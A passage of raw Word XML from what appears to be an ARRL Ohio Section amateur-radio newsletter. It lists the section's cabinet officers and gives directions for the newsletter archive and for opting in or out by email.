    <w:p w14:paraId="20428891" w14:textId="77777777" w:rsidR="005B42A6" w:rsidRPr="00421E35" w:rsidRDefault="005B42A6" w:rsidP="005B42A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Hey, did you know that PostScript and Ohio Section Journal (OSJ) are archived on the website? You can go back and look at any edition simply by clicking:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337DE896" w14:textId="143EF83B" w:rsidR="005B42A6" w:rsidRPr="00421E35" w:rsidRDefault="0084211F" w:rsidP="005B42A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId202" w:history="1">
        <w:r w:rsidR="00F84C0E" w:rsidRPr="0097471E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://arrl-ohio.org/news/index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005B42A6" w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00508808" w14:textId="091045AD" w:rsidR="005B42A6" w:rsidRDefault="005B42A6" w:rsidP="005B42A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="504DC33B" w14:textId="77777777" w:rsidR="00E705A5" w:rsidRDefault="00E705A5" w:rsidP="005B42A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AB8440" w14:textId="2B7D0EA0" w:rsidR="00BB4B42" w:rsidRDefault="0084211F" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="5A4A0805">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D260F09" w14:textId="77777777" w:rsidR="00C35CF2" w:rsidRDefault="00C35CF2" w:rsidP="00BF277B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013FC8D4" w14:textId="0ECB953A" w:rsidR="00EF3E84" w:rsidRPr="00421E35" w:rsidRDefault="00EF3E84" w:rsidP="00EF3E84">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ohio Section Cabinet</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5395"/>
        <w:gridCol w:w="5395"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE289F" w:rsidRPr="00421E35" w14:paraId="1B3A0B3A" w14:textId="77777777" w:rsidTr="00D075F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07081854" w14:textId="2CE3C3BB" w:rsidR="00EE289F" w:rsidRPr="00421E35" w:rsidRDefault="00EE289F" w:rsidP="00EE289F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Manager – </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tom Sly</w:t>
            </w:r>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WB8LCD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C9A018B" w14:textId="3165BB4F" w:rsidR="00EE289F" w:rsidRPr="00421E35" w:rsidRDefault="00EE289F" w:rsidP="00EE289F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Section Emergency Coordinator – Stan Broadway, N8BHL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE289F" w:rsidRPr="00421E35" w14:paraId="1AF6F708" w14:textId="77777777" w:rsidTr="00D075F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CCD6413" w14:textId="3EDA1666" w:rsidR="00EE289F" w:rsidRPr="00421E35" w:rsidRDefault="00EE289F" w:rsidP="00EE289F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technical Coordinator – Jeff Kopcak, K8JTK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E84E2A1" w14:textId="77777777" w:rsidR="00EE289F" w:rsidRPr="00421E35" w:rsidRDefault="00EE289F" w:rsidP="00EE289F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Section Traffic Manager – David Maynard, WA3EZN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE289F" w:rsidRPr="00421E35" w14:paraId="0C8FC1F6" w14:textId="77777777" w:rsidTr="00D075F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F6FBEC2" w14:textId="7774841C" w:rsidR="00EE289F" w:rsidRPr="00421E35" w:rsidRDefault="00EE289F" w:rsidP="00EE289F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>State Government Liaison – Bob Winston, W2THU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CF5CB94" w14:textId="77777777" w:rsidR="00EE289F" w:rsidRPr="00421E35" w:rsidRDefault="00EE289F" w:rsidP="00EE289F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affiliated Clubs Coordinator – Tom Sly, WB8LCD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE289F" w:rsidRPr="00421E35" w14:paraId="116AC810" w14:textId="77777777" w:rsidTr="00D075F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0210C201" w14:textId="11952927" w:rsidR="00EE289F" w:rsidRPr="00421E35" w:rsidRDefault="00EE289F" w:rsidP="00EE289F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Section Youth Coordinator – Anthony L</w:t>
            </w:r>
            <w:r w:rsidR="008E28A1">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>u</w:t>
            </w:r>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>scre, K8ZT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57EF465A" w14:textId="77777777" w:rsidR="00EE289F" w:rsidRPr="00421E35" w:rsidRDefault="00EE289F" w:rsidP="00EE289F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421E35">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Public Information Coordinator – John Ross, KD8IDJ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="592CD03D" w14:textId="766088D6" w:rsidR="00EF3E84" w:rsidRDefault="00EF3E84" w:rsidP="00EF3E84">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74210051" w14:textId="6F4A06CE" w:rsidR="004C639B" w:rsidRDefault="0084211F" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="3C2E2E4C">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC9661" w14:textId="24D0AA46" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252317696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DAB865B" wp14:editId="06ED664B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>5410200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>134620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1436370" cy="1085215"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21233"/>
                <wp:lineTo x="21199" y="21233"/>
                <wp:lineTo x="21199"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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1436370" cy="1085215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Chit – Chat, and All That!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63120365" w14:textId="77777777" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451912B5" w14:textId="5E3D91C8" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Do you know someone that’s not getting these Newsletters? Please, forward a copy of this Newsletter over to them and have them “</w:t>
      </w:r>
      <w:hyperlink r:id="rId204" w:history="1">
        <w:r w:rsidRPr="00421E35">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Opt-In</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>” to start receiving them.  Heck just have them send an email</w:t>
      </w:r>
      <w:r w:rsidR="004E6B49">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to:</w:t>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:hyperlink r:id="rId205" w:history="1">
        <w:r w:rsidR="004E6B49" w:rsidRPr="002B5181">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>webmaster@arrl-ohio.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004E6B49">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E6B49">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">added. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF7B80" w14:textId="77777777" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1761BDDC" w14:textId="4492E6C1" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We now have many thousands of readers receiving these newsletters weekly. Quite impressive, I’d say!  I urge all of you to make sure that everyone, regardless of whether they are a League member or not, get signed up to receive these weekly Newsletters. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD6B2E" w14:textId="77777777" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC57769" w14:textId="7BD481F0" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252318720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D1225CC" wp14:editId="1CB4315B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>73660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1165860" cy="1176655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21332"/>
                <wp:lineTo x="21176" y="21332"/>
                <wp:lineTo x="21176" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1165860" cy="1176655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>You can always “</w:t>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Opt-Out</w:t>
      </w:r>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” at any time if you feel this is not what you were expecting. It’s fun and very informative.  All of your favorite past newsletters are now archived too. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82DDB9" w14:textId="32651549" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00F45A32" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252319744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F8306C9" wp14:editId="30F6F656">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>6066155</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>182245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="734060" cy="1135380"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21383"/>
                <wp:lineTo x="21301" y="21383"/>
                <wp:lineTo x="21301" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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inion taking pictures.jpg"/>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734060" cy="1135380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00421E35" w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">You can go back at any time and read them. Just go to:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId208" w:history="1">
        <w:r w:rsidR="00421E35" w:rsidRPr="00421E35">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://arrl-ohio.org/news/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00421E35" w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D344890" w14:textId="69D08EF5" w:rsidR="00F872CC" w:rsidRDefault="00F872CC" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F855528" w14:textId="6BD70198" w:rsidR="00421E35" w:rsidRPr="00421E35" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E35">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The pictures on the front page and throughout this newsletter are from various newsletters, Facebook posts and/or were sent directly to me in recent weeks. Take a good look at them, you just might be in one of the pictures!  “SMILE…  you’re in the Ohio Section News!!” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3920EC66" w14:textId="2ABDB6E9" w:rsidR="00421E35" w:rsidRPr="00F872CC" w:rsidRDefault="00421E35" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Hlk30329921"/>
    </w:p>
    <w:p w14:paraId="4B274C20" w14:textId="0BD0920B" w:rsidR="00F872CC" w:rsidRDefault="00F872CC" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7F5948" w14:textId="77777777" w:rsidR="007F11C2" w:rsidRDefault="007F11C2" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:p w14:paraId="2F1E6590" w14:textId="3A9298B1" w:rsidR="00C35CF2" w:rsidRDefault="0084211F" w:rsidP="00421E35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="544EA379">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3166E411" w14:textId="4B70E034" w:rsidR="002F17B8" w:rsidRDefault="002F17B8" w:rsidP="00FD0EAD">
      <w:bookmarkStart w:id="39" w:name="_Hlk33264659"/>
      <w:bookmarkStart w:id="40" w:name="_Hlk44181957"/>
    </w:p>
    <w:p w14:paraId="0DA50E46" w14:textId="598C2175" w:rsidR="00261C82" w:rsidRPr="0078690C" w:rsidRDefault="00C22F39" w:rsidP="0078690C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E705A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stop…  We’ll be back next week with another exciting adventure for your reading pleasure!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="6A700402" w14:textId="77777777" w:rsidR="00261C82" w:rsidRDefault="00261C82" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0563C1" w:themeColor="hyperlink"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048BAB3B" w14:textId="60AB3591" w:rsidR="00FD0EAD" w:rsidRPr="00FD0EAD" w:rsidRDefault="0084211F" w:rsidP="00FD0EAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:pict w14:anchorId="0C64E80E">
